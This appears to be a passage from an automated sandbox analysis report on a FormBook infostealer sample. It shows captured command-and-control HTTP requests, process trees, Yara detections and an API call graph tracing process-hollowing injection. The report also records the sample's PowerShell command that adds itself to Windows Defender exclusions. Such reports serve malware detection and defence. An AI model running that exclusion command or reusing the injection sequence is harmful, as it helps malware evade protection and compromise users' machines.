                                          Data Raw: 64 78 57 6c 6a 54 36 3d 74 49 50 73 38 6b 38 6c 36 4a 71 66 6c 78 56 4b 63 2b 76 49 74 41 4c 63 7a 33 7a 4a 73 33 64 49 36 30 78 62 32 45 76 62 78 68 56 46 6f 59 65 79 6d 64 68 48 36 32 45 6f 43 68 55 46 64 64 57 30 6f 4a 4f 66 65 67 52 32 51 2b 53 50 68 65 4b 6b 32 56 75 58 2b 42 76 4f 33 66 62 43 6b 6b 7a 4d 46 47 6c 6b 5a 52 59 45 59 69 4b 32 48 72 2f 76 5a 43 59 6e 57 36 38 4f 7a 2b 50 57 6e 36 74 72 69 75 73 43 59 51 65 56 30 5a 61 71 6e 78 2b 65 33 36 4a 4d 6b 6f 4c 50 64 66 4c 75 2b 30 74 64 42 64 75 41 47 62 62 71 57 67 63 37 77 71 50 61 6f 33 58 79 64 62 2f 32 67 38 52 6b 4e 31 62 4b 73 65 4d 6c 4d 4b 71 76 73 35 57 55 4f 72 71 31 2f 73 6b 6e 78 76 47 45 47 49 62 53 45 4d 7a 54 2f 6d 67 79 49 42 39 59 62 42 6c 53 39 4b 70 71 6f 39 58 63 4d 66 2b 38 6a 57 55 4c 46 47 71 59 32 57 68 47 77 54 61 4d 4a 43 41 65 6d 78 6f 33 53 39 57 74 31 47 63 6c 65 35 4e 5a 2b 71 7a 4b 39 34 68 72 76 52 33 74 46 58 51 4e 6b 41 54 66 33 64 59 31 2f 76 7a 45 34 50 48 43 5a 4d 76 47 42 53 31 54 65 6b 41 57 49 6a [TRUNCATED]
                                          Data Ascii: dxWljT6=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhVFoYeymdhH62EoChUFddW0oJOfegR2Q+SPheKk2VuX+BvO3fbCkkzMFGlkZRYEYiK2Hr/vZCYnW68Oz+PWn6triusCYQeV0Zaqnx+e36JMkoLPdfLu+0tdBduAGbbqWgc7wqPao3Xydb/2g8RkN1bKseMlMKqvs5WUOrq1/sknxvGEGIbSEMzT/mgyIB9YbBlS9Kpqo9XcMf+8jWULFGqY2WhGwTaMJCAemxo3S9Wt1Gcle5NZ+qzK94hrvR3tFXQNkATf3dY1/vzE4PHCZMvGBS1TekAWIj34VAC3I7p+9mf5Ghc/4zmrfX8I55sCPMDJDHDJXigt33cTjo9YP9O+2riGduBc9NgBXcKV6VxRlQcrIOSX2uAaaV6js1RJdKW5iKGWPWZUXuBUSeKsNNwpi54JL1kcsGimRfZ6Q0zaazRN9055rOS62JPP0bESIV2JyMtsml+60dZjpHtOqboJdwsCRcrt4RqBcS7QYIXG+ZA9DQMg9SkBKmrPb1k2jWKr1F5dDo9HbbF5iZO/dXCu1GY+Xa150DYdTx7OCdxIHudaXFISkP4VB9NopteBAssBttW7FNw7MdaSHJuDgXZ189c1ozDChed8PbE4+j4LktAeJp0nI4aNfYvXCvqS2Rs9w8ZjFmXIkCUYWEbL6+Qkz3ry/E3NAYNV1lIL7jicVi3PCv0z41zhweLdltEHDax5qDx9HhQXFD+OfX9cO8eeE+YJal4IIQoaXiM7kxvWZ675KVkvgjzfH9tgrGaghNf/GynUHnE4k0bG6HV2LRmejYLklO3rD1e5SiNclLoq0dvSJEB7EFo3inKL9vBYQpsCL5vH430vk3B4Gk09i/OVzDi3uz/4n28cMhw23MgtVGxTMyGMfHmFWhDeLayZjCZF155zhjGA7tlHjYtMSxag0Ji4eOo/5coPgT/3G6qqmjTZCyIF6X3n+2Xj/U1D+BoH [TRUNCATED]
                                          Sep 7, 2024 21:45:43.320790052 CEST154INHTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:43 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                          Data Ascii: Bad Request


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.456261103.42.108.46804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:45.012057066 CEST499OUTGET /pn1r/?dxWljT6=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:45.913885117 CEST154INHTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:45 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                          Data Ascii: Bad Request


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:15:42:41
                                          Start date:07/09/2024
                                          Path:C:\Users\user\Desktop\Scan 00093847.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Scan 00093847.exe"
                                          Imagebase:0xac0000
                                          File size:798'720 bytes
                                          MD5 hash:7C580B0BF94B5EDB15717136670A8092
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:15:42:55
                                          Start date:07/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"
                                          Imagebase:0xf0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:15:42:55
                                          Start date:07/09/2024
                                          Path:C:\Users\user\Desktop\Scan 00093847.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Scan 00093847.exe"
                                          Imagebase:0x5b0000
                                          File size:798'720 bytes
                                          MD5 hash:7C580B0BF94B5EDB15717136670A8092
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:15:42:55
                                          Start date:07/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:15:43:12
                                          Start date:07/09/2024
                                          Path:C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe"
                                          Imagebase:0xad0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:9
                                          Start time:15:43:14
                                          Start date:07/09/2024
                                          Path:C:\Windows\SysWOW64\setupugc.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\setupugc.exe"
                                          Imagebase:0x8b0000
                                          File size:118'784 bytes
                                          MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:11
                                          Start time:15:43:27
                                          Start date:07/09/2024
                                          Path:C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe"
                                          Imagebase:0xad0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:12
                                          Start time:15:43:39
                                          Start date:07/09/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6bf500000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:3.8%
                                            Total number of Nodes:344
                                            Total number of Limit Nodes:10
                                            execution_graph 37469 13fd0b8 37470 13fd0fe 37469->37470 37474 13fd298 37470->37474 37477 13fd287 37470->37477 37471 13fd1eb 37482 13fc9a0 37474->37482 37478 13fd24b 37477->37478 37479 13fd292 37477->37479 37478->37471 37480 13fc9a0 DuplicateHandle 37479->37480 37481 13fd2c6 37480->37481 37481->37471 37483 13fd300 DuplicateHandle 37482->37483 37484 13fd2c6 37483->37484 37484->37471 37808 13f4668 37809 13f467a 37808->37809 37810 13f4686 37809->37810 37814 13f4778 37809->37814 37819 13f3e1c 37810->37819 37812 13f46a5 37815 13f479d 37814->37815 37823 13f4878 37815->37823 37827 13f4888 37815->37827 37820 13f3e27 37819->37820 37835 13f5c1c 37820->37835 37822 13f6ff0 37822->37812 37825 13f4888 37823->37825 37824 13f498c 37824->37824 37825->37824 37831 13f449c 37825->37831 37828 13f48af 37827->37828 37829 13f449c CreateActCtxA 37828->37829 37830 13f498c 37828->37830 37829->37830 37832 13f5918 CreateActCtxA 37831->37832 37834 13f59db 37832->37834 37834->37834 37836 13f5c27 37835->37836 37839 13f5c3c 37836->37839 37838 13f7095 37838->37822 37840 13f5c47 37839->37840 37843 13f5c6c 37840->37843 37842 13f717a 37842->37838 37844 13f5c77 37843->37844 37845 13f5c9c 3 API calls 37844->37845 37846 13f726d 37845->37846 37846->37842 37485 7a7c16f 37489 7a7dfd8 37485->37489 37508 7a7dfe0 37485->37508 37486 7a7c146 37490 7a7dffa 37489->37490 37502 7a7e01e 37490->37502 37527 7a7e51b 37490->37527 37535 7a7e73d 37490->37535 37540 7a7e674 37490->37540 37545 7a7e815 37490->37545 37550 7a7e436 37490->37550 37559 7a7e5c8 37490->37559 37564 7a7ea88 37490->37564 37568 7a7e84a 37490->37568 37572 7a7e801 37490->37572 37577 7a7e945 37490->37577 37582 7a7e486 37490->37582 37587 7a7e6c6 37490->37587 37596 7a7e986 37490->37596 37601 7a7ea5a 37490->37601 37606 7a7e3da 37490->37606 37610 7a7e63b 37490->37610 37502->37486 37509 7a7dffa 37508->37509 37510 7a7e986 2 API calls 37509->37510 37511 7a7e6c6 5 API calls 37509->37511 37512 7a7e486 3 API calls 37509->37512 37513 7a7e945 3 API calls 37509->37513 37514 7a7e801 2 API calls 37509->37514 37515 7a7e84a 2 API calls 37509->37515 37516 7a7ea88 2 API calls 37509->37516 37517 7a7e5c8 3 API calls 37509->37517 37518 7a7e436 5 API calls 37509->37518 37519 7a7e815 2 API calls 37509->37519 37520 7a7e674 2 API calls 37509->37520 37521 7a7e01e 37509->37521 37522 7a7e73d 2 API calls 37509->37522 37523 7a7e51b 6 API calls 37509->37523 37524 7a7e63b 2 API calls 37509->37524 37525 7a7e3da 2 API calls 37509->37525 37526 7a7ea5a 4 API calls 37509->37526 37510->37521 37511->37521 37512->37521 37513->37521 37514->37521 37515->37521 37516->37521 37517->37521 37518->37521 37519->37521 37520->37521 37521->37486 37522->37521 37523->37521 37524->37521 37525->37521 37526->37521 37528 7a7e521 37527->37528 37615 7a7f180 37528->37615 37621 7a7f16f 37528->37621 37529 7a7e546 37627 7a7b860 37529->37627 37631 7a7b858 37529->37631 37530 7a7ed15 37536 7a7e63a 37535->37536 37538 7a7b860 ResumeThread 37536->37538 37539 7a7b858 ResumeThread 37536->37539 37537 7a7ed15 37538->37537 37539->37537 37541 7a7e697 37540->37541 37649 7a7baa1 37541->37649 37653 7a7baa8 37541->37653 37542 7a7e880 37546 7a7e822 37545->37546 37548 7a7baa1 WriteProcessMemory 37546->37548 37549 7a7baa8 WriteProcessMemory 37546->37549 37547 7a7ea0f 37548->37547 37549->37547 37551 7a7e43f 37550->37551 37552 7a7e451 37551->37552 37554 7a7e737 37551->37554 37657 7a7bb90 37551->37657 37661 7a7bb98 37551->37661 37553 7a7e8f7 37552->37553 37557 7a7b9e1 2 API calls 37552->37557 37665 7a7b9e8 37552->37665 37553->37502 37557->37553 37560 7a7e5d5 37559->37560 37562 7a7b9e1 2 API calls 37560->37562 37563 7a7b9e8 VirtualAllocEx 37560->37563 37561 7a7ea72 37561->37502 37562->37561 37563->37561 37566 7a7baa1 WriteProcessMemory 37564->37566 37567 7a7baa8 WriteProcessMemory 37564->37567 37565 7a7eaaf 37566->37565 37567->37565 37569 7a7e880 37568->37569 37570 7a7baa1 WriteProcessMemory 37568->37570 37571 7a7baa8 WriteProcessMemory 37568->37571 37570->37569 37571->37569 37573 7a7e80f 37572->37573 37575 7a7b860 ResumeThread 37573->37575 37576 7a7b858 ResumeThread 37573->37576 37574 7a7ed15 37575->37574 37576->37574 37579 7a7e4af 37577->37579 37578 7a7e959 37578->37502 37579->37578 37580 7a7b9e1 2 API calls 37579->37580 37581 7a7b9e8 VirtualAllocEx 37579->37581 37580->37578 37581->37578 37583 7a7e4af 37582->37583 37585 7a7b9e1 2 API calls 37583->37585 37586 7a7b9e8 VirtualAllocEx 37583->37586 37584 7a7ea72 37584->37502 37585->37584 37586->37584 37588 7a7e43f 37587->37588 37588->37587 37589 7a7e737 37588->37589 37590 7a7e451 37588->37590 37592 7a7bb90 ReadProcessMemory 37588->37592 37593 7a7bb98 ReadProcessMemory 37588->37593 37591 7a7e8f7 37590->37591 37594 7a7b9e1 2 API calls 37590->37594 37595 7a7b9e8 VirtualAllocEx 37590->37595 37591->37502 37592->37588 37593->37588 37594->37591 37595->37591 37597 7a7e971 37596->37597 37599 7a7b860 ResumeThread 37597->37599 37600 7a7b858 ResumeThread 37597->37600 37598 7a7ed15 37599->37598 37600->37598 37602 7a7eb73 37601->37602 37669 7a7f020 37602->37669 37675 7a7f018 37602->37675 37603 7a7eb8c 37681 7a7bd24 37606->37681 37685 7a7bd30 37606->37685 37607 7a7e417 37611 7a7e655 37610->37611 37613 7a7b860 ResumeThread 37611->37613 37614 7a7b858 ResumeThread 37611->37614 37612 7a7ed15 37613->37612 37614->37612 37616 7a7f195 37615->37616 37635 7a7b9e1 37616->37635 37641 7a7b908 37616->37641 37645 7a7b910 37616->37645 37617 7a7f1ab 37617->37529 37622 7a7f173 37621->37622 37624 7a7b9e1 2 API calls 37622->37624 37625 7a7b910 Wow64SetThreadContext 37622->37625 37626 7a7b908 Wow64SetThreadContext 37622->37626 37623 7a7f1ab 37623->37529 37624->37623 37625->37623 37626->37623 37628 7a7b8a0 ResumeThread 37627->37628 37630 7a7b8d1 37628->37630 37630->37530 37632 7a7b860 ResumeThread 37631->37632 37634 7a7b8d1 37632->37634 37634->37530 37636 7a7b9e6 VirtualAllocEx 37635->37636 37637 7a7b97e Wow64SetThreadContext 37635->37637 37640 7a7ba65 37636->37640 37638 7a7b99d 37637->37638 37638->37617 37640->37617 37642 7a7b910 Wow64SetThreadContext 37641->37642 37644 7a7b99d 37642->37644 37644->37617 37646 7a7b955 Wow64SetThreadContext 37645->37646 37648 7a7b99d 37646->37648 37648->37617 37650 7a7baa8 WriteProcessMemory 37649->37650 37652 7a7bb47 37650->37652 37652->37542 37654 7a7baf0 WriteProcessMemory 37653->37654 37656 7a7bb47 37654->37656 37656->37542 37658 7a7bbe3 ReadProcessMemory 37657->37658 37660 7a7bc27 37658->37660 37660->37551 37662 7a7bbe3 ReadProcessMemory 37661->37662 37664 7a7bc27 37662->37664 37664->37551 37666 7a7ba28 VirtualAllocEx 37665->37666 37668 7a7ba65 37666->37668 37668->37553 37670 7a7f035 37669->37670 37672 7a7b9e1 2 API calls 37670->37672 37673 7a7b910 Wow64SetThreadContext 37670->37673 37674 7a7b908 Wow64SetThreadContext 37670->37674 37671 7a7f04b 37671->37603 37672->37671 37673->37671 37674->37671 37676 7a7f01b 37675->37676 37678 7a7b9e1 2 API calls 37676->37678 37679 7a7b910 Wow64SetThreadContext 37676->37679 37680 7a7b908 Wow64SetThreadContext 37676->37680 37677 7a7f04b 37677->37603 37678->37677 37679->37677 37680->37677 37682 7a7bd30 CreateProcessA 37681->37682 37684 7a7bf7b 37682->37684 37686 7a7bdb9 CreateProcessA 37685->37686 37688 7a7bf7b 37686->37688 37689 5417bc8 37690 5417bf5 37689->37690 37707 5416cfc 37690->37707 37692 5417c8a 37711 5416d0c 37692->37711 37695 5416d0c 3 API calls 37696 5417cee 37695->37696 37715 541750c 37696->37715 37698 5417d20 37719 541752c 37698->37719 37700 5417d84 37701 5416cfc 3 API calls 37700->37701 37702 5417db6 37701->37702 37723 541753c 37702->37723 37704 5417de8 37705 541753c 3 API calls 37704->37705 37706 5417e4c 37705->37706 37708 5416d07 37707->37708 37727 13f5c9c 37708->37727 37709 54192e6 37709->37692 37712 5416d17 37711->37712 37800 5417828 37712->37800 37714 5417cbc 37714->37695 37716 5417517 37715->37716 37717 5416cfc 3 API calls 37716->37717 37718 5419a4f 37717->37718 37718->37698 37720 5417537 37719->37720 37722 13f5c9c 3 API calls 37720->37722 37721 5419d0b 37721->37700 37722->37721 37724 5417547 37723->37724 37804 5417a24 37724->37804 37726 541aa6f 37726->37704 37728 13f5ca7 37727->37728 37730 13f8653 37728->37730 37734 13fad00 37728->37734 37729 13f8691 37729->37709 37730->37729 37738 13fcdf0 37730->37738 37743 13fcde1 37730->37743 37748 13fad38 37734->37748 37752 13fad27 37734->37752 37735 13fad16 37735->37730 37739 13fce11 37738->37739 37740 13fce35 37739->37740 37784 13fcf8f 37739->37784 37788 13fcfa0 37739->37788 37740->37729 37744 13fcdf0 37743->37744 37745 13fce35 37744->37745 37746 13fcf8f 3 API calls 37744->37746 37747 13fcfa0 3 API calls 37744->37747 37745->37729 37746->37745 37747->37745 37756 13fae21 37748->37756 37764 13fae30 37748->37764 37749 13fad47 37749->37735 37753 13fad47 37752->37753 37754 13fae21 2 API calls 37752->37754 37755 13fae30 2 API calls 37752->37755 37753->37735 37754->37753 37755->37753 37757 13fae64 37756->37757 37758 13fae41 37756->37758 37757->37749 37758->37757 37772 13fb0b9 37758->37772 37776 13fb0c8 37758->37776 37759 13fb068 GetModuleHandleW 37761 13fb095 37759->37761 37760 13fae5c 37760->37757 37760->37759 37761->37749 37765 13fae41 37764->37765 37767 13fae64 37764->37767 37765->37767 37770 13fb0b9 LoadLibraryExW 37765->37770 37771 13fb0c8 LoadLibraryExW 37765->37771 37766 13fae5c 37766->37767 37768 13fb068 GetModuleHandleW 37766->37768 37767->37749 37769 13fb095 37768->37769 37769->37749 37770->37766 37771->37766 37773 13fb0c8 37772->37773 37775 13fb101 37773->37775 37780 13fa870 37773->37780 37775->37760 37777 13fb0dc 37776->37777 37778 13fa870 LoadLibraryExW 37777->37778 37779 13fb101 37777->37779 37778->37779 37779->37760 37781 13fb2a8 LoadLibraryExW 37780->37781 37783 13fb321 37781->37783 37783->37775 37785 13fcfad 37784->37785 37786 13fcfe7 37785->37786 37792 13fc8d8 37785->37792 37786->37740 37789 13fcfad 37788->37789 37790 13fc8d8 3 API calls 37789->37790 37791 13fcfe7 37789->37791 37790->37791 37791->37740 37793 13fc8e3 37792->37793 37795 13fd8f8 37793->37795 37796 13fca04 37793->37796 37795->37795 37797 13fca0f 37796->37797 37798 13f5c9c 3 API calls 37797->37798 37799 13fd967 37798->37799 37799->37795 37801 5417833 37800->37801 37803 13f5c9c 3 API calls 37801->37803 37802 54197ac 37802->37714 37803->37802 37805 5417a2f 37804->37805 37806 541aaa2 37805->37806 37807 13f5c9c 3 API calls 37805->37807 37806->37726 37807->37806 37847 135d01c 37848 135d034 37847->37848 37849 135d08e 37848->37849 37852 5410ad4 37848->37852 37861 5412c08 37848->37861 37853 5410adf 37852->37853 37854 5412c79 37853->37854 37856 5412c69 37853->37856 37886 5410bfc 37854->37886 37870 5412d91 37856->37870 37875 5412da0 37856->37875 37880 5412e6c 37856->37880 37857 5412c77 37862 5412c18 37861->37862 37863 5412c79 37862->37863 37865 5412c69 37862->37865 37864 5410bfc CallWindowProcW 37863->37864 37866 5412c77 37864->37866 37867 5412d91 CallWindowProcW 37865->37867 37868 5412da0 CallWindowProcW 37865->37868 37869 5412e6c CallWindowProcW 37865->37869 37867->37866 37868->37866 37869->37866 37872 5412da0 37870->37872 37871 5412e40 37871->37857 37890 5412e47 37872->37890 37894 5412e58 37872->37894 37876 5412db4 37875->37876 37878 5412e47 CallWindowProcW 37876->37878 37879 5412e58 CallWindowProcW 37876->37879 37877 5412e40 37877->37857 37878->37877 37879->37877 37881 5412e2a 37880->37881 37882 5412e7a 37880->37882 37884 5412e47 CallWindowProcW 37881->37884 37885 5412e58 CallWindowProcW 37881->37885 37883 5412e40 37883->37857 37884->37883 37885->37883 37887 5410c07 37886->37887 37888 541435a CallWindowProcW 37887->37888 37889 5414309 37887->37889 37888->37889 37889->37857 37891 5412e58 37890->37891 37892 5412e69 37891->37892 37897 5414292 37891->37897 37892->37871 37895 5412e69 37894->37895 37896 5414292 CallWindowProcW 37894->37896 37895->37871 37896->37895 37898 5410bfc CallWindowProcW 37897->37898 37899 54142aa 37898->37899 37899->37892 37900 7a7f208 37901 7a7f393 37900->37901 37903 7a7f22e 37900->37903 37903->37901 37904 7a7d66c 37903->37904 37905 7a7f488 PostMessageW 37904->37905 37906 7a7f4f4 37905->37906 37906->37903

                                            Executed Functions

                                            Function 05417BC8 Relevance: 3.8, Strings: 2, Instructions: 1335COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 5417bc8-5417bf3 295 5417bf5 294->295 296 5417bfa-5418010 call 5416cfc call 5416d0c * 2 call 541750c call 541751c call 541752c call 5416cfc call 541753c call 541754c call 541753c call 541755c call 541756c call 541757c call 541758c call 541759c 294->296 295->296 363 5418031-5418043 296->363 364 5418012-541801f 363->364 365 5418045-5418055 363->365 367 5418021 364->367 368 5418026-541802e 364->368 366 5418126-5418138 365->366 369 541805a-541807f 366->369 370 541813e-541814e 366->370 367->368 368->363 375 5418081 369->375 376 5418086-5418099 369->376 371 541828b-54182a4 370->371 373 5418153-5418171 371->373 374 54182aa-54182b5 371->374 377 5418173 373->377 378 5418178-5418192 373->378 379 54182ce-54182dd 374->379 375->376 380 54180a0-54180ba 376->380 381 541809b 376->381 377->378 384 5418194 378->384 385 5418199-54181ac 378->385 382 54182b7-54182cb 379->382 383 54182df-54187cf call 54175ac call 541757c call 541758c call 541759c call 54175ac call 54175bc call 54175cc call 541757c call 541758c call 541759c call 54175ac call 54175bc call 54175cc call 541756c call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c 379->383 386 54180c1-54180da 380->386 387 54180bc 380->387 381->380 382->379 470 54187d1-54187dd 383->470 471 54187f9 383->471 384->385 389 54181b3-54181c9 385->389 390 54181ae 385->390 393 54180e1-54180f7 386->393 394 54180dc 386->394 387->386 391 54181d0-54181e6 389->391 392 54181cb 389->392 390->389 396 54181e8 391->396 397 54181ed-5418200 391->397 392->391 398 54180f9 393->398 399 54180fe-5418114 393->399 394->393 396->397 402 5418202 397->402 403 5418207-5418217 397->403 398->399 400 5418116 399->400 401 541811b-5418123 399->401 400->401 401->366 402->403 405 5418219 403->405 406 541821e-5418238 403->406 405->406 409 541823a 406->409 410 541823f-5418250 406->410 409->410 411 5418252 410->411 412 5418257-5418276 410->412 411->412 415 5418278 412->415 416 541827d-5418288 412->416 415->416 416->371 472 54187e7-54187ed 470->472 473 54187df-54187e5 470->473 474 54187ff-541881d 471->474 475 54187f7 472->475 473->475 477 5418824-5418974 474->477 478 541881f 474->478 475->474 491 541897f-5419243 call 54175dc call 54175ec call 541757c call 541758c call 541759c call 54175ac call 541756c call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c call 54175ac call 54175bc call 541757c call 541758c call 541759c call 54175ac call 541757c call 541758c call 541759c call 54175ac call 54175fc call 541760c call 54177b8 call 54177c8 * 11 call 541758c call 54177d8 477->491 478->477
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q$d
                                            • API String ID: 0-2169010058
                                            • Opcode ID: 78bc2ed3cc3d9452b935f3bcfa86788320c94fd706942aa6f4145162555264a4
                                            • Instruction ID: 0b7ae39e690d22b3e1bd0366d704a65521ecc0e089be708275baea76a1263622
